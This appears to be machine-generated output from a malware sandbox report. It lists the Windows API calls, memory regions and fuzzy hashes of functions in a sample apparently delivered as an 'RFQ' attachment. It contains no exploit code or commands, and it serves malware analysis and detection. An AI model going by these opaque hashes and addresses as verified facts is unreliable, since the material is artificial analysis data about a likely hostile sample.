                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                • API String ID: 3648134473-3128320259
                                                                                • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                                                                • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                                                                • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                                                APIs
                                                                                  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                                • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                • String ID:
                                                                                • API String ID: 1211466189-0
                                                                                • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                                                                • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                                                                • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                                                                APIs
                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                • Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                • Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
                                                                                • Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
                                                                                • Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                                                  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                  • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                                                • _memmove.LIBCMT ref: 0046717E
                                                                                • _memmove.LIBCMT ref: 0046719B
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 256516436-0
                                                                                • Opcode ID: e32de89284a9c114d21ef8a3444d82efd98b00da4c460f988641c10183c44841
                                                                                • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                                                                • Opcode Fuzzy Hash: e32de89284a9c114d21ef8a3444d82efd98b00da4c460f988641c10183c44841
                                                                                • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 004861EB
                                                                                • GetDC.USER32(00000000), ref: 004861F3
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                                                                • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                                                                APIs
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                • _wcstok.LIBCMT ref: 0046EC94
                                                                                • _wcscpy.LIBCMT ref: 0046ED23
                                                                                • _memset.LIBCMT ref: 0046ED56
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                • String ID: X
                                                                                • API String ID: 774024439-3081909835
                                                                                • Opcode ID: f1a584b012c4e59189931977c389111896733e6790d1e2742b4354d1f45dd6a8
                                                                                • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                                                                • Opcode Fuzzy Hash: f1a584b012c4e59189931977c389111896733e6790d1e2742b4354d1f45dd6a8
                                                                                • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                                                                APIs
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                                                                                • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                                                                  • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                                                                  • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                                                                • _strlen.LIBCMT ref: 00476D44
                                                                                • _memmove.LIBCMT ref: 00476DAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                • String ID:
                                                                                • API String ID: 3619996494-0
                                                                                • Opcode ID: 19e8c2658f20f8476ca2da37bc64e6d1bda1729b0b31d87f1c8584a2e783eb2e
                                                                                • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                                                                • Opcode Fuzzy Hash: 19e8c2658f20f8476ca2da37bc64e6d1bda1729b0b31d87f1c8584a2e783eb2e
                                                                                • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                                                • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                                                APIs
                                                                                • IsWindow.USER32(00C11C90), ref: 0048B3EB
                                                                                • IsWindowEnabled.USER32(00C11C90), ref: 0048B3F7
                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                                                • SendMessageW.USER32(00C11C90,000000B0,?,?), ref: 0048B512
                                                                                • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                                                • GetWindowLongW.USER32(00C11C90,000000EC), ref: 0048B571
                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                • String ID:
                                                                                • API String ID: 4072528602-0
                                                                                • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                                                • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0047F448
                                                                                • _memset.LIBCMT ref: 0047F511
                                                                                • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                                                  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                • String ID: @
                                                                                • API String ID: 3522835683-2766056989
                                                                                • Opcode ID: 98a06052e6037ea6fb2970c60483761811ec359651e683da2548889ff509ee4d
                                                                                • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                                                                • Opcode Fuzzy Hash: 98a06052e6037ea6fb2970c60483761811ec359651e683da2548889ff509ee4d
                                                                                • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 00460F8C
                                                                                • GetKeyboardState.USER32(?), ref: 00460FA1
                                                                                • SetKeyboardState.USER32(?), ref: 00461002
                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                                                • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 00460DA5
                                                                                • GetKeyboardState.USER32(?), ref: 00460DBA
                                                                                • SetKeyboardState.USER32(?), ref: 00460E1B
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                                                • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsncpy$LocalTime
                                                                                • String ID:
                                                                                • API String ID: 2945705084-0
                                                                                • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                                                                                • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                • String ID: ,,I$DllGetClassObject
                                                                                • API String ID: 753597075-1683996018
                                                                                • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                                • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                                                                • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
